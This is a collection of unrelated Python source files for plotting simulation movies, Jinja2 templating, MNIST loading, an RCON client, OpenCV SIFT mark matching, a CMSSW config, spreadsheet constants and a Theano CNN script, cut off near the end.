    # sampling position z_X, assemble the frames into a webm movie with
    # avconv, then delete the temporary images.
    x_list = []
    for i in plotnames:
        # Derive each class's spatial grid from its first saved frame.
        img = "%s%04d.npy" % (i,0)
        len_x = len(np.load(img))
        x = np.linspace(0,L,len_x)
        x_list.append(x)
    plotname = "%s*" %(plotnames[0])
    # Number of frames = number of saved files for the first class.
    Nt = len(glob.glob(plotname))
    print Nt
    for j in range(Nt):
        for i in range(len(plotnames)):
            img = "%s%04d.npy" % (plotnames[i],j)
            label_name = "%s = %s" % (para_name, parameter_values[i])
            plt.plot(x_list[i],np.load(img),label=label_name)
        # Vertical marker at the travelling-wave sampling position.
        plt.plot([z_X,z_X],[-0.1,1.1],'k')
        plt.text(z_X,-0.2,"x")
        plt.axis([0,L,-0.1,1.1])
        #plt.legend(loc=3)
        #plt.legend(bbox_to_anchor=(0.,1.02,1.,.102), loc=3,ncol=3,mode="expand",borderaxespad=0.)
        #plt.suptitle(moviename)
        nt = (float(T)/Nt)*j
        plt.title("time = %1.1f, z=%1.1f" % (nt,(z_X-nt)))
        plt.savefig("tmp%04d.png" % j)
        # Keep every 25th early frame as a standalone snapshot.
        if(j%25 == 0 and j < 100):
            print j
            plt.savefig("plots/trav_wave%04d.png" % (j/25))
        plt.close()
    os.system('avconv -r 10 -i %s -vcodec libvpx %s.webm' %('tmp%04d.png',moviename))
    for filename in glob.glob('tmp*.png'):
        os.remove(filename)
def add_plot(plotnames,moviename,parameter_values,para_name,L,T,z_X):
    # Like build_plot, but draws the classes as a stacked (cumulative)
    # filled plot per frame before assembling the movie.
    x_list = []
    for i in plotnames:
        img = "%s%04d.npy" % (i,0)
        len_x = len(np.load(img))
        x = np.linspace(0,L,len_x)
        x_list.append(x)
    plotname = "%s*" %(plotnames[0])
    Nt = len(glob.glob(plotname))
    print Nt
    # Fill colours for the second and third stacked bands.
    fc = ['green','red']
    for j in range(Nt):
        for i in range(len(plotnames)):
            img = "%s%04d.npy" % (plotnames[i],j)
            label_name = "%s = %s" % (para_name, parameter_values[i])
            if i == 0:
                # First class: band from 0 up to its values.
                load_val = np.load(img)
                plt.plot(x_list[i],load_val,label=label_name)
                plt.fill_between(x_list[i],0,load_val)
            else:
                # Subsequent classes: accumulate and fill the new band only.
                load_val += np.load(img)
                plt.plot(x_list[i],load_val,label=label_name)
                plt.fill_between(x_list[i],load_val-np.load(img),load_val,facecolor=fc[i-1])
        plt.axis([0,L,0,1.2])
        plt.legend(loc=3)
        plt.suptitle(moviename)
        plt.title("Spatial spread")
        plt.savefig("tmp%04d.png" % j)
        plt.close()
    os.system('avconv -r 10 -i %s -vcodec libvpx %s.webm' %('tmp%04d.png',moviename))
    for filename in glob.glob('tmp*.png'):
        os.remove(filename)
#build_plot(plotnames,moviename,parameter_values,para_name,L,T,z_X)
#os.system('rm images/*')
#plt.plot(r,I_1)
#plt.plot(r,S_1)
#plt.show()
|
from jinja2 import Environment, FileSystemLoader
# Jinja2 environment rooted at the current directory; template.j2 must live
# alongside this script.
ENV = Environment(loader=FileSystemLoader('.'))
template = ENV.get_template("template.j2")
#class method works to a similar output to the Dictionary method
class NetworkInterface(object):
def __init__(self, name, description, vlan, uplink=False):
self.name = name
self.description = description
self.vlan = vlan
self.uplink = uplink
# Render the template with a class instance; attribute access in the
# template works the same as dictionary access would.
interface_obj = NetworkInterface("GigabitEthernet0/1","Server Port", 10)
print(template.render(interface=interface_obj))
|
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
import matplotlib.pyplot as plt
# Reproducible runs: fix both TensorFlow's and NumPy's RNG seeds.
tf.set_random_seed(1)
np.random.seed(1)
BATCH_SIZE = 50
LR = 0.001  # learning rate
# MNIST images come already normalized to the range (0, 1).
mnist = input_data.read_data_sets('./mnist', one_hot=True)
test_x = mnist.test.images[:2000]
test_y = mnist.test.labels[:2000]
# plot one example
print(mnist.train.images.shape)  # (55000, 28 * 28)
print(mnist.train.labels.shape)  # (55000, 10)
print(mnist.train.labels[0].shape)
# Show the first ten training digits one at a time, titled with the label
# (argmax of the one-hot vector).
for i in range(10):
    plt.imshow(mnist.train.images[i].reshape((28, 28)), cmap='gray')
    plt.title('%i' % np.argmax(mnist.train.labels[i]));
    plt.show()
    plt.pause(0.1)
# tf_x = tf.placeholder(tf.float32, [None, 28*28]) / 255.
# image = tf.reshape(tf_x, [-1, 28, 28, 1])   # (batch, height, width, channel)
# tf_y = tf.placeholder(tf.int32, [None, 10])  # input y
|
from mcrcon import MCRcon
class Connection:
    """Thin wrapper around an MCRcon session to a game server."""

    def __init__(self, address, port, secret):
        """Open and keep an RCON connection.

        :param address: server hostname or IP
        :param port: RCON port (previously accepted but silently ignored)
        :param secret: RCON password
        """
        # Bug fix: `port` was never forwarded to MCRcon, so the client
        # always connected on the library's default port regardless of the
        # caller's argument.
        self.mcr = MCRcon(address, secret, port=port)
        self.mcr.connect()

    def send(self, msg):
        """Send one RCON command and return the server's response string."""
        resp = self.mcr.command(msg)
        return resp
|
class Solution:
    def findMedianSortedArrays(self, nums1, nums2):
        """Return the median of the two input lists.

        Merges and re-sorts in O((m+n) log(m+n)); even-length input yields
        the mean of the two middle elements (a float).
        """
        merged = sorted(list(nums1) + list(nums2))
        size = len(merged)
        mid = size // 2
        if size % 2:  # odd length -> single middle element
            return merged[mid]
        return (merged[mid - 1] + merged[mid]) / 2
|
from numpy import array
from numpy import mean
import numpy as np

# Column, row and overall means of a small demo matrix.
M = array([[1, 2, 3, 4, 5, 6], [1, 2, 3, 4, 5, 6]])
col_mean = mean(M, axis=0)  # mean of each column
print(col_mean)
row_mean = mean(M, axis=1)  # mean of each row
print(row_mean)
all_mean = mean(M)  # grand mean over all elements
print(all_mean)

# Expected value of a discrete distribution, computed two ways:
# an explicit sum and numpy's weighted average.
l = [1, 2, 3]
p = [.2, .3, .5]
e = 0
for value, prob in zip(l, p):
    e += value * prob
print(e)
e = np.average(l, weights=p)
print(e)
|
# Copyright (c) Jeremías Casteglione <jrmsdev@gmail.com>
# See LICENSE file.
from _sadm import libdir
from _sadm.service import Service
from _sadm.utils import path
__all__ = ['configure']
def configure(env, cfg):
    """Merge the 'service' settings section and load every enabled service."""
    section_keys = ('config.dir', 'enable')
    env.settings.merge(cfg, 'service', section_keys)
    _loadEnabled(env)
def _loadEnabled(env):
    """Load config.ini for every enabled service.

    For each service name under [service] enable, try first the bundled
    config (libdir) and then the environment-specific one; raise if
    neither exists.
    """
    fn = 'config.ini'
    cfgdir = env.settings.get('service', 'config.dir', fallback = 'service')
    for s in env.settings.getlist('service', 'enable'):
        env.log("enable %s" % s)
        libfn = libdir.fpath('service', s, fn)
        libok = _loadConfig(env, libfn)
        sfn = env.assets.rootdir(cfgdir, s, fn)
        sok = _loadConfig(env, sfn)
        if not sok and not libok:
            # Neither the bundled nor the env-specific file exists.
            raise env.error("%s file not found" % sfn)
def _loadConfig(env, fn):
    """Load the service config file *fn* if it exists.

    Returns True when the file was found and loaded, False otherwise.
    """
    env.debug("load %s" % fn)
    if path.isfile(fn):
        Service(fn)
        return True
    env.debug("%s file not found" % fn)
    return False
|
import numpy as np
import cv2 as cv
from matplotlib import pyplot as plt
# Minimum SIFT matches required before fitting a homography.
MIN_MATCH_COUNT = 5
# Scanned sheet ("Verso") with a registration mark near each corner.
img = cv.imread('C:/Users/Windows/Desktop/Trabalhos/Verso.png',1) # trainImage
# Fixed crops around the four corner regions.
marca1 = img[0:57, 0:57]
marca2 = img[0:57, 540:590]
marca3 = img[790:840, 0:57]
marca4 = img[790:840, 540:590]
gray1 = cv.cvtColor(marca1,cv.COLOR_BGR2GRAY)
gray2 = cv.cvtColor(marca2,cv.COLOR_BGR2GRAY)
gray3 = cv.cvtColor(marca3,cv.COLOR_BGR2GRAY)
gray4 = cv.cvtColor(marca4,cv.COLOR_BGR2GRAY)
# Strongest single corner (maxCorners=1) in each crop.
corners1 = cv.goodFeaturesToTrack(gray1, 1,0.9,10)
corners2 = cv.goodFeaturesToTrack(gray2, 1,0.9,10)
corners3 = cv.goodFeaturesToTrack(gray3, 1,0.9,10)
corners4 = cv.goodFeaturesToTrack(gray4, 1,0.9,10)
corners1 = np.int0(corners1)
corners2 = np.int0(corners2)
corners3 = np.int0(corners3)
corners4 = np.int0(corners4)
# Cut a small template (marcatN) around each detected corner; each loop
# runs once since only one corner was requested per crop.
for i in corners1:
    x,y = i.ravel()
    marcat = img[y-10:y+10, x-1:x+19] # queryImage
for f in corners2:
    x,y = f.ravel()
    marcat2 = img[y-10:y+10, 519+x:539+x] # queryImage
for g in corners3:
    x,y = g.ravel()
    marcat3 = img[771+y:792+y, x-10:x+10] # queryImage
for h in corners4:
    x,y = h.ravel()
    marcat4 = img[771+y:792+y, 530+x:550+x] # queryImage
# Initiate SIFT detector
sift = cv.xfeatures2d.SIFT_create()
# find the keypoints and descriptors with SIFT (first, top-left mark)
kp1, des1 = sift.detectAndCompute(marcat,None)
kp2, des2 = sift.detectAndCompute(marca1,None)
# FLANN matcher with a KD-tree index; reused for all four marks.
FLANN_INDEX_KDTREE = 1
index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
search_params = dict(checks = 50)
flann = cv.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1,des2,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
    if m.distance < 0.7*n.distance:
        good.append(m)
if len(good)>MIN_MATCH_COUNT:
    # Fit a RANSAC homography from template points to crop points and draw
    # the template's projected outline on the full image.
    src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
    dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
    M, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)
    matchesMask = mask.ravel().tolist()
    h,w,d = marcat.shape
    pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
    dst = cv.perspectiveTransform(pts,M)
    img = cv.polylines(img,[np.int32(dst)],True,255,3, cv.LINE_AA)
else:
    print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
    matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
                   singlePointColor = None,
                   matchesMask = matchesMask, # draw only inliers
                   flags = 2)
img3 = cv.drawMatches(marcat,kp1,img,kp2,good,None,**draw_params)
# find the keypoints and descriptors with SIFT (second, top-right mark)
kp3, des3 = sift.detectAndCompute(marcat2,None)
kp4, des4 = sift.detectAndCompute(marca2,None)
matches = flann.knnMatch(des3,des4,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
    if m.distance < 0.7*n.distance:
        good.append(m)
if len(good)>MIN_MATCH_COUNT:
    src_pts2 = np.float32([ kp3[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
    dst_pts2 = np.float32([ kp4[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
    M2, mask = cv.findHomography(src_pts2, dst_pts2, cv.RANSAC,5.0)
    matchesMask = mask.ravel().tolist()
    h2,w2,d2 = marcat2.shape
    pts2 = np.float32([ [0,0],[0,h2-1],[w2-1,h2-1],[w2-1,0] ]).reshape(-1,1,2)
    dst2 = cv.perspectiveTransform(pts2,M2)
    # Bug fix: draw this mark's own projected outline (dst2); the original
    # redrew the first mark's outline (dst) by copy-paste mistake.
    img = cv.polylines(img,[np.int32(dst2)],True,255,3, cv.LINE_AA)
else:
    print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
    matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
                   singlePointColor = None,
                   matchesMask = matchesMask, # draw only inliers
                   flags = 2)
img4 = cv.drawMatches(marcat2,kp3,img3,kp4,good,None,**draw_params)
# find the keypoints and descriptors with SIFT (third, bottom-left mark)
kp5, des5 = sift.detectAndCompute(marcat3,None)
kp6, des6 = sift.detectAndCompute(marca3,None)
matches = flann.knnMatch(des5,des6,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
    if m.distance < 0.7*n.distance:
        good.append(m)
if len(good)>MIN_MATCH_COUNT:
    src_pts = np.float32([ kp5[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
    dst_pts = np.float32([ kp6[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
    M3, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)
    matchesMask = mask.ravel().tolist()
    # Bug fix: use this template's own dimensions (the original reused
    # marcat.shape from the first mark by copy-paste mistake).
    h,w,d = marcat3.shape
    pts3 = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
    dst3 = cv.perspectiveTransform(pts3,M3)
    # Bug fix: draw this mark's own projected outline (dst3), not dst.
    img = cv.polylines(img,[np.int32(dst3)],True,255,3, cv.LINE_AA)
else:
    print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
    matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
                   singlePointColor = None,
                   matchesMask = matchesMask, # draw only inliers
                   flags = 2)
img5 = cv.drawMatches(marcat3,kp5,img4,kp6,good,None,**draw_params)
# find the keypoints and descriptors with SIFT (fourth, bottom-right mark)
kp7, des7 = sift.detectAndCompute(marcat4,None)
kp8, des8 = sift.detectAndCompute(marca4,None)
matches = flann.knnMatch(des7,des8,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
    if m.distance < 0.7*n.distance:
        good.append(m)
if len(good)>MIN_MATCH_COUNT:
    src_pts = np.float32([ kp7[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
    dst_pts = np.float32([ kp8[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
    M4, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)
    matchesMask = mask.ravel().tolist()
    # Bug fix: use this template's own dimensions (the original reused
    # marcat.shape from the first mark by copy-paste mistake).
    h,w,d = marcat4.shape
    pts4 = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
    dst4 = cv.perspectiveTransform(pts4,M4)
    # Bug fix: draw this mark's own projected outline (dst4), not dst.
    img = cv.polylines(img,[np.int32(dst4)],True,255,3, cv.LINE_AA)
else:
    print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
    matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
                   singlePointColor = None,
                   matchesMask = matchesMask, # draw only inliers
                   flags = 2)
img6 = cv.drawMatches(marcat4,kp7,img5,kp8,good,None,**draw_params)
plt.imshow(img6, 'gray'),plt.show()
|
import FWCore.ParameterSet.Config as cms
# CMSSW configuration: run the Calo and PF MC-truth tree producers over a
# RelVal QCD sample.
process = cms.Process("Ana")
process.load("FWCore.MessageService.MessageLogger_cfi")
############# Set the number of events #############
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1000)
)
############# Define the source file ###############
process.load("JetMETCorrections.MCJet.RelValQCD_cfi")
#process.source = cms.Source("PoolSource",
#    fileNames = cms.untracked.vstring('/store/relval/CMSSW_3_4_0_pre2/RelValQCD_FlatPt_15_3000/GEN-SIM-RECO/MC_3XY_V10-v1/0003/D085615A-A5BD-DE11-8897-0026189437E8.root')
#)
############# CaloJets ############################
# MC-truth tree pairing ak4 calorimeter jets with generator jets.
process.caloMctruthTree = cms.EDAnalyzer("CaloMCTruthTreeProducer",
    jets = cms.string('ak4CaloJets'),
    genjets = cms.string('ak4GenJets'),
    histogramFile = cms.string('ak4CaloMctruthTree.root')
)
############# PFJets ############################
# Same tree for particle-flow jets.
process.pfMctruthTree = cms.EDAnalyzer("PFMCTruthTreeProducer",
    jets = cms.string('ak4PFJets'),
    genjets = cms.string('ak4GenJets'),
    histogramFile = cms.string('ak4PFMctruthTree.root')
)
############# Path ###########################
process.p = cms.Path(process.caloMctruthTree * process.pfMctruthTree)
############# Format MessageLogger #################
# Report progress only every 10 events.
process.MessageLogger.cerr.FwkReport.reportEvery = 10
|
# Constants for reading the "planilha_de_repasse" transfer spreadsheet.
# The string values are the literal (Portuguese) column headers / cell
# values in that file and must not be translated.

# Path to access data
DATA_PATH = './Data/planilha_de_repasse.xlsx'
# Value of used column keys
DATA_KEY_CONCILIATION = 'Conciliação'
DATA_KEY_PAYMENT_WAY = 'Método de pagamento'
DATA_KEY_ML_COMMISSION = 'Comissão ML por parcela'
DATA_KEY_GROSS_AMOUNT = 'Valor bruto da parcela'
DATA_KEY_TRANSACTION_DATE = 'Data da transação'
DATA_KEY_ID_SELLER = 'ID do pedido Seller'
DATA_KEY_COMMISSION = '% Comissão'
DATA_KEY_ANTICIPATION_VALUE = 'Valor da antecipação'
DATA_KEY_NET_VALUE = 'Valor líquido da parcela'
# Ways of payment
PAYMENT_WAY_BOLETO = 'Boleto'
PAYMENT_WAY_CARD = 'Cartão de Crédito'
PAYMENT_WAY_ESTORNO = 'Estorno'
PAYMENT_WAY_TRANSFERENCIA = 'Transferência'
# Reconciliation possibilities
CONCILIATION_OPTION_CONCILIATED = 'Conciliado'
CONCILIATION_OPTION_NOT_CONCILIATED = 'Não Conciliado'
CONCILIATION_OPTION_WITHDRAWAL = 'Retirada'
CONCILIATION_OPTION_MOVEMENT = 'Movimentação'
|
import cPickle
import gzip
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
from theano.tensor.signal import downsample
from theano.tensor.nnet import conv
from logistic_sgd import LogisticRegression, load_data
from mlp import HiddenLayer
from convolutional_mlp import LeNetConvPoolLayer
import argparse
import array
import csv
# Command-line interface for the Theano CNN train/test script (Python 2).
# NOTE(review): `usage` is defined but never passed to ArgumentParser.
usage="Usage: < input (.csv/.np/.dat) > <output (.csv/.np/.dat)> < hidden layer (comma sep) > <begin_vec_col> [args]"
parser = argparse.ArgumentParser(
    description=__doc__,
    fromfile_prefix_chars='@'  # allow "@file" arguments holding options
)
# Positional input: the feature matrix (x).
parser.add_argument('input_file',
                    metavar='INPUT_FILE',
                    type=str,
                    help='input file name (x)')
## structure and parameters of CNN
parser.add_argument(
    "--ch",
    type=int,
    dest="channel",
    help="input channel",
    default=1)
parser.add_argument(
    "--n_class",
    dest="n_class",
    type=int,
    default=2,
    help="# of output classes (log-layer)")
parser.add_argument(
    "-r",
    "--result",
    dest="result_filename",
    default=None,
    help="output result")
parser.add_argument(
    "-T",
    "--train",
    dest="train",
    type=int,
    default=1,
    help="# of training epochs")
parser.add_argument(
    "-B",
    "--batch",
    dest="batch",
    type=int,
    default=1,
    help="batch size")
parser.add_argument(
    "-c",
    "--comp",
    dest="compressed_file",
    default=None,
    help="compressed output file name")
parser.add_argument(
    "--mlp_layer",
    dest="mlp_layer",
    type=int,
    nargs="+",
    default=[500],
    help="number of MLP layers")
# Conv-layer hyper-parameters; pool/filter entries are "H,W" strings
# parsed with split(",") in __main__.
parser.add_argument(
    "--pool",
    dest="pool",
    type=str,
    nargs="+",
    default=["2,2","2,2"],
    help="array of pooling sizes (convolution layer parameters)")
parser.add_argument(
    "--filter",
    dest="filter",
    type=str,
    nargs="+",
    default=["5,5","5,5"],
    help="array of filter sizes (convolution layer parameters)")
# NOTE(review): help text below looks copy-pasted from --filter; this is
# actually the number of kernels per conv layer.
parser.add_argument(
    "--n_kernel",
    dest="n_kernel",
    type=int,
    nargs="+",
    default=[20,50],
    help="array of filter sizes (convolution layer parameters)")
parser.add_argument(
    "--input_shape",
    dest="input_shape",
    type=int,
    nargs="+",
    default=[28,28],
    help="input size (convolution layer parameters)")
parser.add_argument(
    "--validation_freq",
    dest="validation_freq",
    type=int,
    default=1000,
    help="validation frequency to indicate # of iteration")
# Optional second feature matrix concatenated before the output layer.
parser.add_argument(
    "--input2",
    dest="input2",
    type=str,
    default=None,
    help="second input")
parser.add_argument(
    "--mlp_layer2",
    dest="mlp_layer2",
    type=int,
    nargs="+",
    default=[500],
    help="number of MLP layers")
## file format
parser.add_argument(
    "-l",
    "--load",
    dest="param_file",
    help="load parameters file (.dump)")
parser.add_argument(
    "--numpy",
    action="store_true",
    dest="numpy",
    help="use numpy file format as input/output/answer-set",
    default=False)
parser.add_argument(
    "-D",
    "--dat",
    dest="dat_col",
    default="",
    help="use dat(binary) file format with indicated columns as input")
parser.add_argument(
    "-a",
    "--ans",
    dest="ans_filename",
    help="answer-set file (and enable fine-tuning)",)
parser.add_argument(
    "-A",
    "--ans_col",
    dest="ans_col",
    type=int,
    nargs="+",
    default=None,
    help="answer collumn id (csv) (and enable fine-tuning)")
parser.add_argument(
    "-s",
    "--save",
    dest="save_param_filename",
    default=None,
    help="filename to save parameters")
# Number of leading CSV columns to skip before the feature vector starts.
parser.add_argument(
    "-i",
    "--ignore",
    dest="ignore_col",
    type=int,
    default=0,
    help="")
## parse
args = parser.parse_args()
class CNN(object):
    """LeNet-style convolutional network built with Theano (Python 2).

    Architecture: a stack of conv+pool layers (LeNetConvPoolLayer), a stack
    of tanh MLP hidden layers, and a LogisticRegression output layer.  An
    optional second input ``x2`` (when ``x2_size > 0``) is concatenated to
    the last hidden layer's output just before the output layer.
    """
    def __init__(self, rng,
                 x2_size=0,
                 input_shape=(28,28),
                 pool_size=[(2,2),(2,2)],
                 filter_size=[(5,5),(5,5)],
                 input_tensor=2,
                 input_channel=1,
                 nkerns=[20, 50],
                 n_class=10,
                 mlp_layer=[500],
                 mlp_layer2=[500]):
        """Store hyper-parameters and allocate the symbolic input variables.

        :param rng: numpy RandomState used to initialize layer weights
        :param x2_size: width of the optional second input (0 = disabled)
        :param input_tensor: 2 -> matrix input, 3 -> tensor3 (multi-channel)

        NOTE(review): the list default arguments are shared between calls;
        they appear to be only read here, but confirm no caller mutates them.
        """
        self.rng=rng
        self.input_tensor=input_tensor
        self.input_channel=input_channel
        self.nkerns=nkerns
        self.n_class=n_class
        self.mlp_layer=mlp_layer
        # NOTE(review): mlp_layer2 is stored but never used by load()/build().
        self.mlp_layer2=mlp_layer2
        self.var_index = T.lscalar()   # symbolic minibatch index
        self.var_y = T.ivector('y')    # symbolic label vector
        self.var_x = self.get_x_var()  # matrix or tensor3, per input_tensor
        self.x2_size = x2_size
        print "------------------"
        print x2_size
        if self.x2_size>0:
            self.var_x2 = T.matrix('x2')  # optional second input
        else:
            self.var_x2 = None
        self.input_shape=input_shape
        self.pool_size=pool_size
        self.filter_size=filter_size
    def get_image_shapes(self):
        """Return the feature-map shape after each conv/pool stage.

        The first element is the raw input shape; each following element is
        the shape after one 'valid' convolution (shrinks by filter-1) and
        pooling (integer division by the pool size).
        """
        ret=[]
        ishape=self.input_shape
        ret.append(ishape)
        for i in xrange(len(self.filter_size)):
            next_ishape0=(ishape[0]-self.filter_size[i][0]+1)/self.pool_size[i][0]
            next_ishape1=(ishape[1]-self.filter_size[i][1]+1)/self.pool_size[i][1]
            ret.append((next_ishape0,next_ishape1))
            ishape=(next_ishape0,next_ishape1)
        return ret
    def get_vars(self):
        """Return the (index, x, y) symbolic variables as a tuple."""
        return(self.var_index,self.var_x,self.var_y)
    def get_x_var(self):
        """Allocate the symbolic input variable.

        Matrix for flat input (input_tensor==2), tensor3 for multi-channel
        input (input_tensor==3).
        NOTE(review): any other input_tensor value leaves ``x`` unbound and
        raises NameError on the return -- confirm the accepted values.
        """
        if self.input_tensor==2:
            x = T.matrix('x')
        elif self.input_tensor==3:
            x = T.tensor3('x')
        return x
    def load(self,params,batch_size):
        """Rebuild the network graph from previously saved parameters.

        :param params: dict produced by save_CNN with keys
            'cnn1'/'cnn2' (conv W/b per layer) and 'ws'/'bs' (hidden +
            output layer W/b).
        :param batch_size: minibatch size the graph is shaped for
        :return: (errors_fn, mlp_output, y_pred) symbolic pieces
        """
        index,x,y=self.get_vars()
        ishape = self.input_shape
        ishapes=self.get_image_shapes()
        ch=self.input_channel
        mlp_layer=self.mlp_layer
        ######################
        # BUILD ACTUAL MODEL #
        ######################
        print '... building the model'
        # Reshape matrix of rasterized images of shape (batch_size,28*28)
        # to a 4D tensor, compatible with our LeNetConvPoolLayer
        cnn_layers=[]
        cnn_layer_input = x.reshape((batch_size,self.input_channel, ishapes[0][0], ishapes[0][1]))
        for i in xrange(len(self.filter_size)):
            filter0=self.filter_size[i]
            # input channels: raw channels for the first conv layer,
            # previous layer's kernel count afterwards
            if i ==0:
                ch=self.input_channel
            else:
                ch=self.nkerns[i-1]
            cnn_layer = LeNetConvPoolLayer(self.rng, input=cnn_layer_input,
                image_shape=(batch_size, ch, ishapes[i][0], ishapes[i][1]),
                W=params['cnn1'][i],
                b=params['cnn2'][i],
                filter_shape=(self.nkerns[i], ch, filter0[0], filter0[1]),
                poolsize=self.pool_size[i])
            cnn_layer_input=cnn_layer.output
        last_index=len(self.filter_size)
        # flatten the last conv feature maps into an MLP input matrix
        layer_input = cnn_layer_input.flatten(2)
        n_layer_input=self.nkerns[last_index-1] * ishapes[last_index][0] * ishapes[last_index][1]
        for layer_index in xrange(len(mlp_layer)):
            n_out=mlp_layer[layer_index]
            lW = theano.shared(params['ws'][layer_index],borrow=True)
            lb = theano.shared(params['bs'][layer_index],borrow=True)
            layer = HiddenLayer(self.rng, input=layer_input, n_in=n_layer_input,
                W=lW,
                b=lb,
                n_out=n_out, activation=T.tanh)
            layer_input=layer.output
            n_layer_input=n_out
        mlp_output=layer_input
        # the saved 'ws'/'bs' lists hold the output layer after the hidden ones
        lr_index=len(mlp_layer)
        lW = theano.shared(params['ws'][lr_index],borrow=True)
        lb = theano.shared(params['bs'][lr_index],borrow=True)
        if self.x2_size>0:
            # append the second input just before the output layer
            layer_input=theano.tensor.concatenate([mlp_output,self.var_x2],axis=1)
            lr_layer = LogisticRegression(input=layer_input,
                W=lW,
                b=lb,
                n_in=n_layer_input+self.x2_size,
                n_out=self.n_class)
            cost = lr_layer.negative_log_likelihood(y)
            return(lr_layer.errors, mlp_output,lr_layer.get_y_pred())
        else:
            lr_layer = LogisticRegression(input=layer_input,
                W=lW,
                b=lb,
                n_in=n_layer_input, n_out=self.n_class)
            cost = lr_layer.negative_log_likelihood(y)
            return(lr_layer.errors, mlp_output,lr_layer.get_y_pred())
    def build(self,batch_size):
        """Build the network graph with freshly initialized parameters.

        :param batch_size: minibatch size the graph is shaped for
        :return: (errors_fn, mlp_output, y_pred, cost,
                  cnn_params, mlp_params, lr_params)
        """
        # allocate symbolic variables for the data
        index,x,y=self.get_vars()
        ishape = self.input_shape
        ishapes=self.get_image_shapes()
        ch=self.input_channel
        mlp_layer=self.mlp_layer
        mlp_layer2=self.mlp_layer2
        ######################
        # BUILD ACTUAL MODEL #
        ######################
        print '... building the model'
        # Reshape matrix of rasterized images of shape (batch_size,28*28)
        # to a 4D tensor, compatible with our LeNetConvPoolLayer
        cnn_layer_input = x.reshape((batch_size,self.input_channel, ishapes[0][0], ishapes[0][1]))
        cnn_params=[]
        for i in xrange(len(self.filter_size)):
            filter0=self.filter_size[i]
            if i ==0:
                ch=self.input_channel
            else:
                ch=self.nkerns[i-1]
            # W=None/b=None lets the layer initialize its own parameters
            cnn_layer = LeNetConvPoolLayer(self.rng, input=cnn_layer_input,
                image_shape=(batch_size, ch, ishapes[i][0], ishapes[i][1]),
                W=None,
                b=None,
                filter_shape=(self.nkerns[i], ch, filter0[0], filter0[1]),
                poolsize=self.pool_size[i])
            cnn_params+=cnn_layer.params
            cnn_layer_input=cnn_layer.output
        last_index=len(self.filter_size)
        layer_input = cnn_layer_input.flatten(2)
        n_layer_input=self.nkerns[last_index-1] * ishapes[last_index][0] * ishapes[last_index][1]
        mlp_params=[]
        for layer_index in xrange(len(mlp_layer)):
            n_out=mlp_layer[layer_index]
            layer = HiddenLayer(self.rng, input=layer_input, n_in=n_layer_input,
                W=None,b=None,
                n_out=n_out, activation=T.tanh)
            mlp_params+=layer.params
            layer_input=layer.output
            n_layer_input=n_out
        mlp_output=layer_input
        if self.x2_size>0:
            print self.x2_size
            print n_layer_input+self.x2_size,
            lr_index=len(mlp_layer)
            # append the second input just before the output layer
            layer_input=theano.tensor.concatenate([mlp_output,self.var_x2],axis=1)
            lr_layer = LogisticRegression(input=layer_input,
                W=None,
                b=None,
                n_in=n_layer_input+self.x2_size,
                n_out=self.n_class)
            cost = lr_layer.negative_log_likelihood(y)
            return(lr_layer.errors, mlp_output, lr_layer.get_y_pred(),cost,cnn_params,mlp_params,lr_layer.params)
        else:
            lr_index=len(mlp_layer)
            lr_layer = LogisticRegression(input=layer_input,
                W=None,b=None,
                n_in=n_layer_input, n_out=self.n_class)
            cost = lr_layer.negative_log_likelihood(y)
            return(lr_layer.errors, mlp_output, lr_layer.get_y_pred(),cost,cnn_params,mlp_params,lr_layer.params)
def test_CNN(train_set_x=None,train_set_y=None,
train_set_x2=None,
batch_size=500,param=None,
compress_out=None,
result_filename=None,
cnn=None):
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0]
n_train_batches /= batch_size
# allocate symbolic variables for the data
# error function
errors,compress,pred = cnn.load(param,batch_size=batch_size)
index,x,y=cnn.get_vars()
x2=cnn.var_x2
if train_set_y!=None:
if train_set_x2==None:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
else:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
test_losses = [test_model(i) for i in xrange(n_train_batches)]
test_score = numpy.mean(test_losses)
print (('... model %f %%') % (test_score * 100.))
if compress_out!=None:
compress_model = theano.function([index],compress,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size]})
